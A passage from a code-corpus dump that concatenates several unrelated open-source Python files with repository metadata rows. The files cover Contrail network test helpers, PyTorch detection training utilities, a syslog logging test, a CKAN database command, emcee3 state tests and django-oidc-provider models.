teardown_mocks(cls.orig_mocked_values)
# end tearDownClass
def setUp(self, extra_mocks=None, extra_config_knobs=None):
self._logger.info("Running %s" %(self.id()))
super(TestCase, self).setUp()
# end setUp
def tearDown(self):
self._logger.info("Finished %s" %(self.id()))
self.wait_till_api_server_idle()
super(TestCase, self).tearDown()
# end tearDown
def wait_till_api_server_idle(self):
# wait for in-flight messages to be processed
if hasattr(self._api_server._db_conn, '_msgbus'):
while self._api_server._db_conn._msgbus.num_pending_messages() > 0:
gevent.sleep(0.001)
vhost_url = self._api_server._db_conn._msgbus._urls
while not FakeKombu.is_empty(vhost_url, 'vnc_config'):
gevent.sleep(0.001)
# wait_till_api_server_idle
def create_virtual_network(self, vn_name, vn_subnet='10.0.0.0/24'):
vn_obj = VirtualNetwork(name=vn_name)
ipam_fq_name = [
'default-domain', 'default-project', 'default-network-ipam']
ipam_obj = self._vnc_lib.network_ipam_read(fq_name=ipam_fq_name)
subnets = [vn_subnet] if isinstance(vn_subnet, basestring) else vn_subnet
subnet_infos = []
for subnet in subnets:
cidr = IPNetwork(subnet)
subnet_infos.append(
IpamSubnetType(
subnet=SubnetType(
str(cidr.network),
int(cidr.prefixlen),
),
default_gateway=str(IPAddress(cidr.last - 1)),
subnet_uuid=str(uuid.uuid4()),
)
)
subnet_data = VnSubnetsType(subnet_infos)
vn_obj.add_network_ipam(ipam_obj, subnet_data)
self._vnc_lib.virtual_network_create(vn_obj)
vn_obj.clear_pending_updates()
return vn_obj
# end create_virtual_network
def _create_service(self, vn_list, si_name, auto_policy,
create_right_port=True, **kwargs):
sa_set = None
if kwargs.get('service_virtualization_type') == 'physical-device':
pr = PhysicalRouter(si_name)
self._vnc_lib.physical_router_create(pr)
sa_set = ServiceApplianceSet('sa_set-'+si_name)
self._vnc_lib.service_appliance_set_create(sa_set)
sa = ServiceAppliance('sa-'+si_name, parent_obj=sa_set)
for if_type, _ in vn_list:
attr = ServiceApplianceInterfaceType(interface_type=if_type)
pi = PhysicalInterface('pi-'+si_name+if_type, parent_obj=pr)
self._vnc_lib.physical_interface_create(pi)
sa.add_physical_interface(pi, attr)
self._vnc_lib.service_appliance_create(sa)
sti = [ServiceTemplateInterfaceType(k) for k, _ in vn_list]
st_prop = ServiceTemplateType(
flavor='medium',
image_name='junk',
ordered_interfaces=True,
interface_type=sti, **kwargs)
service_template = ServiceTemplate(
name=si_name + 'template',
service_template_properties=st_prop)
if sa_set:
service_template.add_service_appliance_set(sa_set)
self._vnc_lib.service_template_create(service_template)
scale_out = ServiceScaleOutType()
if kwargs.get('service_mode') in ['in-network', 'in-network-nat']:
if_list = [ServiceInstanceInterfaceType(virtual_network=vn)
for _, vn in vn_list]
si_props = ServiceInstanceType(auto_policy=auto_policy,
interface_list=if_list,
scale_out=scale_out)
else:
if_list = [ServiceInstanceInterfaceType(),
ServiceInstanceInterfaceType()]
si_props = ServiceInstanceType(interface_list=if_list,
scale_out=scale_out)
service_instance = ServiceInstance(
name=si_name, service_instance_properties=si_props)
service_instance.add_service_template(service_template)
self._vnc_lib.service_instance_create(service_instance)
if kwargs.get('version') == 2:
proj = Project()
pt = PortTuple('pt-'+si_name, parent_obj=service_instance)
self._vnc_lib.port_tuple_create(pt)
for if_type, vn_name in vn_list:
if if_type == 'right' and not create_right_port:
continue
port = VirtualMachineInterface(si_name+if_type, parent_obj=proj)
vmi_props = VirtualMachineInterfacePropertiesType(
service_interface_type=if_type)
vn_obj = self._vnc_lib.virtual_network_read(fq_name_str=vn_name)
port.set_virtual_machine_interface_properties(vmi_props)
port.add_virtual_network(vn_obj)
port.add_port_tuple(pt)
self._vnc_lib.virtual_machine_interface_create(port)
# Let a chance to the API to create iip for the vmi of the pt
# before creating the si and the schema allocates an iip
# address to the service chain
gevent.sleep(0.1)
return service_instance.get_fq_name_str()
def create_network_policy(self, vn1, vn2, service_list=None, mirror_service=None,
auto_policy=False, create_right_port = True, **kwargs):
vn1_name = vn1 if isinstance(vn1, basestring) else vn1.get_fq_name_str()
vn2_name = vn2 if isinstance(vn2, basestring) else vn2.get_fq_name_str()
addr1 = AddressType(virtual_network=vn1_name, subnet=kwargs.get('subnet_1'))
addr2 = AddressType(virtual_network=vn2_name, subnet=kwargs.get('subnet_2'))
port = PortType(-1, 0)
service_name_list = []
si_list = service_list or []
if service_list:
for service in si_list:
service_name_list.append(self._create_service(
[('left', vn1_name), ('right', vn2_name)], service,
auto_policy, create_right_port, **kwargs))
if mirror_service:
mirror_si = self._create_service(
[('left', vn1_name), ('right', vn2_name)], mirror_service, False,
service_mode='transparent', service_type='analyzer')
action_list = ActionListType()
if mirror_service:
mirror = MirrorActionType(analyzer_name=mirror_si)
action_list.mirror_to=mirror
if service_name_list:
action_list.apply_service=service_name_list
else:
action_list.simple_action='pass'
prule = PolicyRuleType(direction="<>", protocol="any",
src_addresses=[addr1], dst_addresses=[addr2],
src_ports=[port], dst_ports=[port],
action_list=action_list)
pentry = PolicyEntriesType([prule])
np = NetworkPolicy(str(uuid.uuid4()), network_policy_entries=pentry)
if auto_policy:
return np
self._vnc_lib.network_policy_create(np)
return np
# end create_network_policy
def create_logical_router(self, name, nb_of_attached_networks=1, **kwargs):
lr = LogicalRouter(name, **kwargs)
vns = []
vmis = []
iips = []
for idx in range(nb_of_attached_networks):
# Virtual Network
vn = self.create_virtual_network('%s-network%d' % (name, idx),
'10.%d.0.0/24' % idx)
vns.append(vn)
# Virtual Machine Interface
vmi_name = '%s-network%d-vmi' % (name, idx)
vmi = VirtualMachineInterface(
vmi_name, parent_type='project',
fq_name=['default-domain', 'default-project', vmi_name])
vmi.set_virtual_machine_interface_device_owner(
'network:router_interface')
vmi.add_virtual_network(vn)
self._vnc_lib.virtual_machine_interface_create(vmi)
lr.add_virtual_machine_interface(vmi)
vmis.append(vmi)
# Instance IP
gw_ip = vn.get_network_ipam_refs()[0]['attr'].ipam_subnets[0].\
default_gateway
subnet_uuid = vn.get_network_ipam_refs()[0]['attr'].\
ipam_subnets[0].subnet_uuid
iip = InstanceIp(name='%s-network%d-iip' % (name, idx))
iip.set_subnet_uuid(subnet_uuid)
iip.set_virtual_machine_interface(vmi)
iip.set_virtual_network(vn)
iip.set_instance_ip_family('v4')
iip.set_instance_ip_address(gw_ip)
self._vnc_lib.instance_ip_create(iip)
iips.append(iip)
self._vnc_lib.logical_router_create(lr)
return lr, vns, vmis, iips
def _security_group_rule_build(self, rule_info, sg_fq_name_str):
protocol = rule_info['protocol']
port_min = rule_info['port_min'] or 0
port_max = rule_info['port_max'] or 65535
direction = rule_info['direction'] or 'ingress'
ip_prefix = rule_info['ip_prefix']
ether_type = rule_info['ether_type']
if ip_prefix:
cidr = ip_prefix.split('/')
pfx = cidr[0]
pfx_len = int(cidr[1])
endpt = [AddressType(subnet=SubnetType(pfx, pfx_len))]
else:
endpt = [AddressType(security_group=sg_fq_name_str)]
local = None
remote = None
if direction == 'ingress':
dir = '>'
local = endpt
remote = [AddressType(security_group='local')]
else:
dir = '>'
remote = endpt
local = [AddressType(security_group='local')]
if not protocol:
protocol = 'any'
if protocol.isdigit():
protocol = int(protocol)
if protocol < 0 or protocol > 255:
raise Exception('SecurityGroupRuleInvalidProtocol-%s' % protocol)
else:
if protocol not in ['any', 'tcp', 'udp', 'icmp', 'icmp6']:
raise Exception('SecurityGroupRuleInvalidProtocol-%s' % protocol)
if not ip_prefix and not sg_fq_name_str:
if not ether_type:
ether_type = 'IPv4'
sgr_uuid = str(uuid.uuid4())
rule = PolicyRuleType(rule_uuid=sgr_uuid, direction=dir,
protocol=protocol,
src_addresses=local,
src_ports=[PortType(0, 65535)],
dst_addresses=remote,
dst_ports=[PortType(port_min, port_max)],
ethertype=ether_type)
return rule
#end _security_group_rule_build
def _security_group_rule_append(self, sg_obj, sg_rule):
rules = sg_obj.get_security_group_entries()
if rules is None:
rules = PolicyEntriesType([sg_rule])
else:
for sgr in rules.get_policy_rule() or []:
sgr_copy = copy.copy(sgr)
sgr_copy.rule_uuid = sg_rule.rule_uuid
if sg_rule == sgr_copy:
raise Exception('SecurityGroupRuleExists %s' % sgr.rule_uuid)
rules.add_policy_rule(sg_rule)
sg_obj.set_security_group_entries(rules)
#end _security_group_rule_append
def _security_group_rule_remove(self, sg_obj, sg_rule):
rules = sg_obj.get_security_group_entries()
if rules is None:
raise Exception('SecurityGroupRuleNotExists %s' % sgr.rule_uuid)
else:
for sgr in rules.get_policy_rule() or []:
if sgr.rule_uuid == sg_rule.rule_uuid:
rules.delete_policy_rule(sgr)
sg_obj.set_security_group_entries(rules)
return
raise Exception('SecurityGroupRuleNotExists %s' % sg_rule.rule_uuid)
#end _security_group_rule_append
# end TestCase
class ErrorInterceptingLogger(sandesh_logger.SandeshLogger):
_exceptions = []
_other_errors = []
@classmethod
def register_exception(cls, msg, *args, **kwargs):
if 'traceback' in msg.lower():
cls._exceptions.append((msg, args, kwargs))
return True
return False
@classmethod
def register_error(cls, msg, *args, **kwargs):
if not cls.register_exception(msg, *args, **kwargs):
cls._other_errors.append((msg, args, kwargs))
@classmethod
def get_exceptions(cls):
return list(cls._exceptions)
@classmethod
def get_other_errors(cls):
return list(cls._other_errors)
@classmethod
def reset(cls):
cls._exceptions, cls._other_errors = [], []
@classmethod
def get_qualified_name(cls):
return '{module_name}.{class_name}'.format(
module_name=cls.__module__, class_name=cls.__name__)
class LoggerWrapper(object):
def __init__(self, logger):
self._logger = logger
def __getattr__(self, item):
return getattr(self._logger, item)
def error(self, msg, *args, **kwargs):
ErrorInterceptingLogger.register_error(msg, *args, **kwargs)
return self._logger.error(msg, *args, **kwargs)
def critical(self, msg, *args, **kwargs):
ErrorInterceptingLogger.register_error(msg, *args, **kwargs)
return self._logger.critical(msg, *args, **kwargs)
def exception(self, msg, *args, **kwargs):
ErrorInterceptingLogger.register_error(msg, *args, **kwargs)
return self._logger.exception(msg, *args, **kwargs)
def log(self, lvl, msg, *args, **kwargs):
ErrorInterceptingLogger.register_exception(
msg, *args, **kwargs)
return self._logger.log(lvl, msg, *args, **kwargs)
def __init__(self, *args, **kwargs):
super(ErrorInterceptingLogger, self).__init__(*args, **kwargs)
self._logger = ErrorInterceptingLogger.LoggerWrapper(
self._logger)
| apache-2.0 | -2,208,394,981,384,609,800 | 37.410698 | 121 | 0.594897 | false |
pytorch/vision | references/detection/utils.py | 1 | 8671 | from collections import defaultdict, deque
import datetime
import errno
import os
import time
import torch
import torch.distributed as dist
class SmoothedValue(object):
"""Track a series of values and provide access to smoothed values over a
window or the global series average.
"""
def __init__(self, window_size=20, fmt=None):
if fmt is None:
fmt = "{median:.4f} ({global_avg:.4f})"
self.deque = deque(maxlen=window_size)
self.total = 0.0
self.count = 0
self.fmt = fmt
def update(self, value, n=1):
self.deque.append(value)
self.count += n
self.total += value * n
def synchronize_between_processes(self):
"""
Warning: does not synchronize the deque!
"""
if not is_dist_avail_and_initialized():
return
t = torch.tensor([self.count, self.total], dtype=torch.float64, device='cuda')
dist.barrier()
dist.all_reduce(t)
t = t.tolist()
self.count = int(t[0])
self.total = t[1]
@property
def median(self):
d = torch.tensor(list(self.deque))
return d.median().item()
@property
def avg(self):
d = torch.tensor(list(self.deque), dtype=torch.float32)
return d.mean().item()
@property
def global_avg(self):
return self.total / self.count
@property
def max(self):
return max(self.deque)
@property
def value(self):
return self.deque[-1]
def __str__(self):
return self.fmt.format(
median=self.median,
avg=self.avg,
global_avg=self.global_avg,
max=self.max,
value=self.value)
def all_gather(data):
"""
Run all_gather on arbitrary picklable data (not necessarily tensors)
Args:
data: any picklable object
Returns:
list[data]: list of data gathered from each rank
"""
world_size = get_world_size()
if world_size == 1:
return [data]
data_list = [None] * world_size
dist.all_gather_object(data_list, data)
return data_list
def reduce_dict(input_dict, average=True):
"""
Args:
input_dict (dict): all the values will be reduced
average (bool): whether to do average or sum
Reduce the values in the dictionary from all processes so that all processes
have the averaged results. Returns a dict with the same fields as
input_dict, after reduction.
"""
world_size = get_world_size()
if world_size < 2:
return input_dict
with torch.no_grad():
names = []
values = []
# sort the keys so that they are consistent across processes
for k in sorted(input_dict.keys()):
names.append(k)
values.append(input_dict[k])
values = torch.stack(values, dim=0)
dist.all_reduce(values)
if average:
values /= world_size
reduced_dict = {k: v for k, v in zip(names, values)}
return reduced_dict
class MetricLogger(object):
def __init__(self, delimiter="\t"):
self.meters = defaultdict(SmoothedValue)
self.delimiter = delimiter
def update(self, **kwargs):
for k, v in kwargs.items():
if isinstance(v, torch.Tensor):
v = v.item()
assert isinstance(v, (float, int))
self.meters[k].update(v)
def __getattr__(self, attr):
if attr in self.meters:
return self.meters[attr]
if attr in self.__dict__:
return self.__dict__[attr]
raise AttributeError("'{}' object has no attribute '{}'".format(
type(self).__name__, attr))
def __str__(self):
loss_str = []
for name, meter in self.meters.items():
loss_str.append(
"{}: {}".format(name, str(meter))
)
return self.delimiter.join(loss_str)
def synchronize_between_processes(self):
for meter in self.meters.values():
meter.synchronize_between_processes()
def add_meter(self, name, meter):
self.meters[name] = meter
def log_every(self, iterable, print_freq, header=None):
i = 0
if not header:
header = ''
start_time = time.time()
end = time.time()
iter_time = SmoothedValue(fmt='{avg:.4f}')
data_time = SmoothedValue(fmt='{avg:.4f}')
space_fmt = ':' + str(len(str(len(iterable)))) + 'd'
if torch.cuda.is_available():
log_msg = self.delimiter.join([
header,
'[{0' + space_fmt + '}/{1}]',
'eta: {eta}',
'{meters}',
'time: {time}',
'data: {data}',
'max mem: {memory:.0f}'
])
else:
log_msg = self.delimiter.join([
header,
'[{0' + space_fmt + '}/{1}]',
'eta: {eta}',
'{meters}',
'time: {time}',
'data: {data}'
])
MB = 1024.0 * 1024.0
for obj in iterable:
data_time.update(time.time() - end)
yield obj
iter_time.update(time.time() - end)
if i % print_freq == 0 or i == len(iterable) - 1:
eta_seconds = iter_time.global_avg * (len(iterable) - i)
eta_string = str(datetime.timedelta(seconds=int(eta_seconds)))
if torch.cuda.is_available():
print(log_msg.format(
i, len(iterable), eta=eta_string,
meters=str(self),
time=str(iter_time), data=str(data_time),
memory=torch.cuda.max_memory_allocated() / MB))
else:
print(log_msg.format(
i, len(iterable), eta=eta_string,
meters=str(self),
time=str(iter_time), data=str(data_time)))
i += 1
end = time.time()
total_time = time.time() - start_time
total_time_str = str(datetime.timedelta(seconds=int(total_time)))
print('{} Total time: {} ({:.4f} s / it)'.format(
header, total_time_str, total_time / len(iterable)))
def collate_fn(batch):
return tuple(zip(*batch))
def warmup_lr_scheduler(optimizer, warmup_iters, warmup_factor):
def f(x):
if x >= warmup_iters:
return 1
alpha = float(x) / warmup_iters
return warmup_factor * (1 - alpha) + alpha
return torch.optim.lr_scheduler.LambdaLR(optimizer, f)
def mkdir(path):
try:
os.makedirs(path)
except OSError as e:
if e.errno != errno.EEXIST:
raise
def setup_for_distributed(is_master):
"""
This function disables printing when not in master process
"""
import builtins as __builtin__
builtin_print = __builtin__.print
def print(*args, **kwargs):
force = kwargs.pop('force', False)
if is_master or force:
builtin_print(*args, **kwargs)
__builtin__.print = print
def is_dist_avail_and_initialized():
if not dist.is_available():
return False
if not dist.is_initialized():
return False
return True
def get_world_size():
if not is_dist_avail_and_initialized():
return 1
return dist.get_world_size()
def get_rank():
if not is_dist_avail_and_initialized():
return 0
return dist.get_rank()
def is_main_process():
return get_rank() == 0
def save_on_master(*args, **kwargs):
if is_main_process():
torch.save(*args, **kwargs)
def init_distributed_mode(args):
if 'RANK' in os.environ and 'WORLD_SIZE' in os.environ:
args.rank = int(os.environ["RANK"])
args.world_size = int(os.environ['WORLD_SIZE'])
args.gpu = int(os.environ['LOCAL_RANK'])
elif 'SLURM_PROCID' in os.environ:
args.rank = int(os.environ['SLURM_PROCID'])
args.gpu = args.rank % torch.cuda.device_count()
else:
print('Not using distributed mode')
args.distributed = False
return
args.distributed = True
torch.cuda.set_device(args.gpu)
args.dist_backend = 'nccl'
print('| distributed init (rank {}): {}'.format(
args.rank, args.dist_url), flush=True)
torch.distributed.init_process_group(backend=args.dist_backend, init_method=args.dist_url,
world_size=args.world_size, rank=args.rank)
torch.distributed.barrier()
setup_for_distributed(args.rank == 0)
| bsd-3-clause | -5,394,417,501,050,074,000 | 28.39322 | 94 | 0.548149 | false |
LowieHuyghe/edmunds | tests/log/drivers/testsyslog.py | 1 | 2970 |
from tests.testcase import TestCase
from tests.foundation.syslogserver import SysLogServer
class TestSysLog(TestCase):
"""
Test the SysLog
"""
def set_up(self):
"""
Set up the test case
"""
super(TestSysLog, self).set_up()
self._server = SysLogServer()
self._server.start()
def tear_down(self):
"""
Tear down the test case
"""
super(TestSysLog, self).tear_down()
self._server.stop()
def test_sys_log(self):
"""
Test the sys log
"""
info_string = 'info_%s' % self.rand_str(20)
warning_string = 'warning_%s' % self.rand_str(20)
error_string = 'error_%s' % self.rand_str(20)
# Write config
self.write_config([
"from edmunds.log.drivers.syslog import SysLog \n",
"from logging.handlers import SysLogHandler \n",
"from logging import WARNING \n",
"APP = { \n",
" 'debug': False, \n",
" 'log': { \n",
" 'enabled': True, \n",
" 'instances': [ \n",
" { \n",
" 'name': 'syslog',\n",
" 'driver': SysLog,\n",
" 'level': WARNING,\n",
" 'address': ('%s', %i),\n" % (self._server.host, self._server.port),
" 'facility': SysLogHandler.LOG_USER,\n",
" 'socktype': None,\n",
" 'format': '%(message)s',\n",
" }, \n",
" { \n",
" 'name': 'syslog2',\n",
" 'driver': SysLog,\n",
" 'level': WARNING,\n",
" 'address': ('%s', %i),\n" % (self._server.host, self._server.port),
" }, \n",
" ], \n",
" }, \n",
"} \n",
])
# Create app
app = self.create_application()
# Add route
rule = '/' + self.rand_str(20)
@app.route(rule)
def handle_route():
app.logger.info(info_string)
app.logger.warning(warning_string)
app.logger.error(error_string)
return ''
with app.test_client() as c:
# Check syslog
self.assert_not_in(info_string, '\n'.join(self._server.get_data()))
self.assert_not_in(warning_string, '\n'.join(self._server.get_data()))
self.assert_not_in(error_string, '\n'.join(self._server.get_data()))
# Call route
c.get(rule)
# Check syslog
self.assert_not_in(info_string, '\n'.join(self._server.get_data()))
self.assert_in(warning_string, '\n'.join(self._server.get_data()))
self.assert_in(error_string, '\n'.join(self._server.get_data()))
| apache-2.0 | 7,226,208,718,824,647,000 | 30.595745 | 95 | 0.437037 | false |
yhteentoimivuuspalvelut/ckanext-ytp-request | ckanext/ytp/request/command.py | 1 | 1325 | import logging
from ckan.lib.cli import CkanCommand
class InitDBCommand(CkanCommand):
"""
Initialises the database with the required tables
Connects to the CKAN database and creates the member request tables
Usage:
paster initdb
- Creates the database table member request
"""
summary = __doc__.split('\n')[0]
usage = __doc__
max_args = 0
min_args = 0
def __init__(self, name):
super(InitDBCommand, self).__init__(name)
def command(self):
"""
Parse command line arguments and call appropriate method.
"""
# if not self.args or self.args[0] in ['--help', '-h', 'help']:
# print self.usage
# sys.exit(1)
# cmd = self.args[0]
self._load_config()
# Initialise logger after the config is loaded, so it is not disabled.
self.log = logging.getLogger(__name__)
# if cmd == 'initdb':
import ckan.model as model
model.Session.remove()
model.Session.configure(bind=model.meta.engine)
import ckanext.ytp.request.model as rmodel
self.log.info("Initializing tables")
rmodel.init_tables()
self.log.info("DB tables are setup")
# else:
# self.log.error('Command %s not recognized' % (cmd,))
| agpl-3.0 | -445,495,278,592,315,600 | 26.604167 | 78 | 0.587925 | false |
dfm/emcee3 | emcee3/tests/unit/test_state.py | 1 | 1654 | # -*- coding: utf-8 -*-
from __future__ import division, print_function
import numpy as np
from ...state import State
__all__ = ["test_dtype", "test_serialization", "test_repr"]
def test_dtype(seed=1234):
np.random.seed(seed)
dtype = [
("coords", np.float64, (4, )),
("log_prior", np.float64),
("log_likelihood", np.float64),
("accepted", bool)
]
coords = np.random.randn(4)
state = State(coords)
assert state.dtype == np.dtype(dtype)
state = State(coords, face=10.0, blah=6, _hidden=None)
dtype += [
("blah", int),
("face", float),
]
assert state.dtype == np.dtype(dtype)
state = State(coords, face=10.0, blah=6, _hidden=None,
matrix=np.ones((3, 1)))
dtype += [
("matrix", float, (3, 1)),
]
assert state.dtype == np.dtype(dtype)
state = State(coords, face=10.0, blah=6, _hidden=None,
matrix=np.ones((3, 1)), vector=np.zeros(3))
dtype += [
("vector", float, (3,)),
]
assert state.dtype == np.dtype(dtype)
def test_serialization(seed=1234):
np.random.seed(seed)
coords = np.random.randn(4)
state = State(coords, 0.0, -1.5, True, face="blah")
array = state.to_array()
assert np.allclose(array["coords"], coords)
new_state = State.from_array(array)
assert state == new_state
def test_repr():
coords = np.zeros(1)
lnp = 0.0
lnl = -1.5
state = State(coords, lnp, lnl, True)
assert (
repr(state) ==
"State(array({0}), log_prior={1}, log_likelihood={2}, accepted=True)"
.format(coords, lnp, lnl)
)
| mit | 8,939,081,856,143,124,000 | 23.686567 | 77 | 0.555623 | false |
allenai/document-qa | docqa/nn/span_prediction_ops.py | 1 | 4078 | import tensorflow as tf
import numpy as np
"""
Some utility functions for dealing with span prediction in tensorflow
"""
def best_span_from_bounds(start_logits, end_logits, bound=None):
"""
Brute force approach to finding the best span from start/end logits in tensorflow, still usually
faster then the python dynamic-programming version
"""
b = tf.shape(start_logits)[0]
# Using `top_k` to get the index and value at once is faster
# then using argmax and then gather to get in the value
top_k = tf.nn.top_k(start_logits + end_logits, k=1)
values, indices = [tf.squeeze(x, axis=[1]) for x in top_k]
# Convert to (start_position, length) format
indices = tf.stack([indices, tf.fill((b,), 0)], axis=1)
# TODO Might be better to build the batch x n_word x n_word
# matrix and use tf.matrix_band to zero out the unwanted ones...
if bound is None:
n_lengths = tf.shape(start_logits)[1]
else:
# take the min in case the bound > the context
n_lengths = tf.minimum(bound, tf.shape(start_logits)[1])
def compute(i, values, indices):
top_k = tf.nn.top_k(start_logits[:, :-i] + end_logits[:, i:])
b_values, b_indices = [tf.squeeze(x, axis=[1]) for x in top_k]
b_indices = tf.stack([b_indices, tf.fill((b, ), i)], axis=1)
indices = tf.where(b_values > values, b_indices, indices)
values = tf.maximum(values, b_values)
return i+1, values, indices
_, values, indices = tf.while_loop(
lambda ix, values, indices: ix < n_lengths,
compute,
[1, values, indices],
back_prop=False)
spans = tf.stack([indices[:, 0], indices[:, 0] + indices[:, 1]], axis=1)
return spans, values
def packed_span_f1_mask(spans, l, bound):
starts = []
ends = []
for i in range(bound):
s = tf.range(0, l - i, dtype=tf.int32)
starts.append(s)
ends.append(s + i)
starts = tf.concat(starts, axis=0)
ends = tf.concat(ends, axis=0)
starts = tf.tile(tf.expand_dims(starts, 0), [tf.shape(spans)[0], 1])
ends = tf.tile(tf.expand_dims(ends, 0), [tf.shape(spans)[0], 1])
pred_len = tf.cast(ends - starts + 1, tf.float32)
span_start = tf.maximum(starts, spans[:, 0:1])
span_stop = tf.minimum(ends, spans[:, 1:2])
overlap_len = tf.cast(span_stop - span_start + 1, tf.float32)
true_len = tf.cast(spans[:, 1:2] - spans[:, 0:1] + 1, tf.float32)
p = overlap_len / pred_len
r = overlap_len / true_len
return tf.where(overlap_len > 0, 2 * p * r / (p + r), tf.zeros(tf.shape(starts)))
def to_packed_coordinates(spans, l, bound=None):
""" Converts the spans to vector of packed coordiantes, in the packed format
spans are indexed first by length, then by start position. If bound is given
spans are truncated to be of `bound` length """
lens = spans[:, 1] - spans[:, 0]
if bound is not None:
lens = tf.minimum(lens, bound-1)
return spans[:, 0] + l * lens - lens * (lens - 1) // 2
def to_packed_coordinates_np(spans, l, bound=None):
""" Converts the spans to vector of packed coordiantes, in the packed format
spans are indexed first by length, then by start position in a flattened array.
If bound is given spans are truncated to be of `bound` length """
lens = spans[:, 1] - spans[:, 0]
if bound is not None:
lens = np.minimum(lens, bound-1)
return spans[:, 0] + l * lens - lens * (lens - 1) // 2
def to_unpacked_coordinates(ix, l, bound):
ix = tf.cast(ix, tf.int32)
# You can actually compute the lens in closed form:
# lens = tf.floor(0.5 * (-tf.sqrt(4 * tf.square(l) + 4 * l - 8 * ix + 1) + 2 * l + 1))
# but it is very ugly and rounding errors could cause problems, so this approach seems safer
lens = []
for i in range(bound):
lens.append(tf.fill((l - i,), i))
lens = tf.concat(lens, axis=0)
lens = tf.gather(lens, ix)
answer_start = ix - l * lens + lens * (lens - 1) // 2
return tf.stack([answer_start, answer_start+lens], axis=1)
| apache-2.0 | 2,821,853,730,584,280,600 | 36.072727 | 100 | 0.615498 | false |
bunnyinc/django-oidc-provider | oidc_provider/models.py | 1 | 6596 | # -*- coding: utf-8 -*-
import base64
import binascii
from hashlib import md5, sha256
import json
from django.db import models
from django.utils import timezone
from django.utils.translation import ugettext_lazy as _
from django.conf import settings
CLIENT_TYPE_CHOICES = [
('confidential', 'Confidential'),
('public', 'Public'),
]
RESPONSE_TYPE_CHOICES = [
('code', 'code (Authorization Code Flow)'),
('id_token', 'id_token (Implicit Flow)'),
('id_token token', 'id_token token (Implicit Flow)'),
('code token', 'code token (Hybrid Flow)'),
('code id_token', 'code id_token (Hybrid Flow)'),
('code id_token token', 'code id_token token (Hybrid Flow)'),
]
JWT_ALGS = [
('HS256', 'HS256'),
('RS256', 'RS256'),
]
class Client(models.Model):
name = models.CharField(max_length=100, default='', verbose_name=_(u'Name'))
client_type = models.CharField(max_length=30, choices=CLIENT_TYPE_CHOICES, default='confidential', verbose_name=_(u'Client Type'), help_text=_(u'<b>Confidential</b> clients are capable of maintaining the confidentiality of their credentials. <b>Public</b> clients are incapable.'))
client_id = models.CharField(max_length=255, unique=True, verbose_name=_(u'Client ID'))
client_secret = models.CharField(max_length=255, blank=True, verbose_name=_(u'Client SECRET'))
response_type = models.CharField(max_length=30, choices=RESPONSE_TYPE_CHOICES, verbose_name=_(u'Response Type'))
jwt_alg = models.CharField(max_length=10, choices=JWT_ALGS, default='RS256', verbose_name=_(u'JWT Algorithm'), help_text=_(u'Algorithm used to encode ID Tokens.'))
date_created = models.DateField(auto_now_add=True, verbose_name=_(u'Date Created'))
website_url = models.CharField(max_length=255, blank=True, default='', verbose_name=_(u'Website URL'))
terms_url = models.CharField(max_length=255, blank=True, default='', verbose_name=_(u'Terms URL'), help_text=_(u'External reference to the privacy policy of the client.'))
contact_email = models.CharField(max_length=255, blank=True, default='', verbose_name=_(u'Contact Email'))
logo = models.FileField(blank=True, default='', upload_to='oidc_provider/clients', verbose_name=_(u'Logo Image'))
_redirect_uris = models.TextField(default='', verbose_name=_(u'Redirect URIs'), help_text=_(u'Enter each URI on a new line.'))
def redirect_uris():
def fget(self):
return self._redirect_uris.splitlines()
def fset(self, value):
self._redirect_uris = '\n'.join(value)
return locals()
redirect_uris = property(**redirect_uris())
_post_logout_redirect_uris = models.TextField(blank=True, default='', verbose_name=_(u'Post Logout Redirect URIs'), help_text=_(u'Enter each URI on a new line.'))
def post_logout_redirect_uris():
def fget(self):
return self._post_logout_redirect_uris.splitlines()
def fset(self, value):
self._post_logout_redirect_uris = '\n'.join(value)
return locals()
post_logout_redirect_uris = property(**post_logout_redirect_uris())
class Meta:
verbose_name = _(u'Client')
verbose_name_plural = _(u'Clients')
def __str__(self):
return u'{0}'.format(self.name)
def __unicode__(self):
return self.__str__()
@property
def default_redirect_uri(self):
return self.redirect_uris[0] if self.redirect_uris else ''
class BaseCodeTokenModel(models.Model):
user = models.ForeignKey(settings.AUTH_USER_MODEL, verbose_name=_(u'User'))
client = models.ForeignKey(Client, verbose_name=_(u'Client'))
expires_at = models.DateTimeField(verbose_name=_(u'Expiration Date'))
_scope = models.TextField(default='', verbose_name=_(u'Scopes'))
def scope():
def fget(self):
return self._scope.split()
def fset(self, value):
self._scope = ' '.join(value)
return locals()
scope = property(**scope())
def has_expired(self):
return timezone.now() >= self.expires_at
def __str__(self):
return u'{0} - {1}'.format(self.client, self.user.email)
def __unicode__(self):
return self.__str__()
class Meta:
abstract = True
class Code(BaseCodeTokenModel):
code = models.CharField(max_length=255, unique=True, verbose_name=_(u'Code'))
nonce = models.CharField(max_length=255, blank=True, default='', verbose_name=_(u'Nonce'))
is_authentication = models.BooleanField(default=False, verbose_name=_(u'Is Authentication?'))
code_challenge = models.CharField(max_length=255, null=True, verbose_name=_(u'Code Challenge'))
code_challenge_method = models.CharField(max_length=255, null=True, verbose_name=_(u'Code Challenge Method'))
class Meta:
verbose_name = _(u'Authorization Code')
verbose_name_plural = _(u'Authorization Codes')
class Token(BaseCodeTokenModel):
access_token = models.CharField(max_length=255, unique=True, verbose_name=_(u'Access Token'))
refresh_token = models.CharField(max_length=255, unique=True, verbose_name=_(u'Refresh Token'))
_id_token = models.TextField(verbose_name=_(u'ID Token'))
def id_token():
def fget(self):
return json.loads(self._id_token)
def fset(self, value):
self._id_token = json.dumps(value)
return locals()
id_token = property(**id_token())
class Meta:
verbose_name = _(u'Token')
verbose_name_plural = _(u'Tokens')
@property
def at_hash(self):
# @@@ d-o-p only supports 256 bits (change this if that changes)
hashed_access_token = sha256(
self.access_token.encode('ascii')
).hexdigest().encode('ascii')
return base64.urlsafe_b64encode(
binascii.unhexlify(
hashed_access_token[:len(hashed_access_token) // 2]
)
).rstrip(b'=').decode('ascii')
class UserConsent(BaseCodeTokenModel):
date_given = models.DateTimeField(verbose_name=_(u'Date Given'))
class Meta:
unique_together = ('user', 'client')
class RSAKey(models.Model):
key = models.TextField(verbose_name=_(u'Key'), help_text=_(u'Paste your private RSA Key here.'))
class Meta:
verbose_name = _(u'RSA Key')
verbose_name_plural = _(u'RSA Keys')
def __str__(self):
return u'{0}'.format(self.kid)
def __unicode__(self):
return self.__str__()
@property
def kid(self):
return u'{0}'.format(md5(self.key.encode('utf-8')).hexdigest() if self.key else '')
| mit | -7,244,896,210,937,017,000 | 35.043716 | 285 | 0.642359 | false |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.